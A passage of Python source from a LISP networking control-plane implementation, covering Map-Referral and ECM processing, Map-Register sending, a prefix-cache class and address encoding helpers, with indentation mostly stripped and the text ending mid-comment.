mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message received by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in the Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop, cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from the cached entry
# that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for the Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group itself as the
# destination, so we have to send to the loopback address to bootstrap
# our membership. We join via one other member of the peer-group so we
# can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use a 16-byte key, which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send a LISP control packet that is to be sourced from UDP port 4342 to
# the lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if NAT-traversal is configured, use the same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
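#
# The following is an illustrative sketch added for documentation purposes
# only; nothing in this file calls it. It shows that byte_swap_64() above
# reverses the byte order of a 64-bit value the same way a struct re-pack
# does. It assumes the module-level "struct" import used throughout this
# file.
#
def _example_byte_swap_64():
    value = 0x0102030405060708
    swapped = byte_swap_64(value)
    #
    # Pack little-endian, read back big-endian, which reverses the bytes.
    #
    repacked = struct.unpack(">Q", struct.pack("<Q", value))[0]
    assert swapped == repacked == 0x0807060504030201
    return(swapped)
#enddef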
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in self.cache[ml].entries.values():
if (prefix.is_more_specific(entry.eid)): found = entry
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in self.cache[ml].entries.values():
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = len(t) / 2
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
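#
# Illustrative sketch, not referenced by the rest of this file: shows how a
# lisp_cache() is keyed and searched. An entry object only needs an "eid"
# attribute for longest-match lookups; real callers store richer objects
# such as lisp_mapping() or lisp_referral(). The lisp_address() class used
# here is defined further below in this file.
#
def _example_cache_usage():
    class _entry():
        def __init__(self, eid): self.eid = eid
    #endclass
    cache = lisp_cache()
    prefix = lisp_address(LISP_AFI_NONE, "", 0, 0)
    prefix.store_prefix("[1000]10.0.0.0/8")
    cache.add_cache(prefix, _entry(prefix))
    #
    # Longest-match lookup for a host EID inside the /8 returns the entry.
    #
    host = lisp_address(LISP_AFI_NONE, "", 0, 0)
    host.store_prefix("[1000]10.1.1.1/32")
    return(cache.lookup_cache(host, False))
#enddef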
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be returned if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the returned entry and, if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a Python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because "L" was producing
# 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order-byte zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There is a common IPv6 address input mistake. The address ff::/8
# (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow the user to specify ff::/8, placing the byte in the high-order
# byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
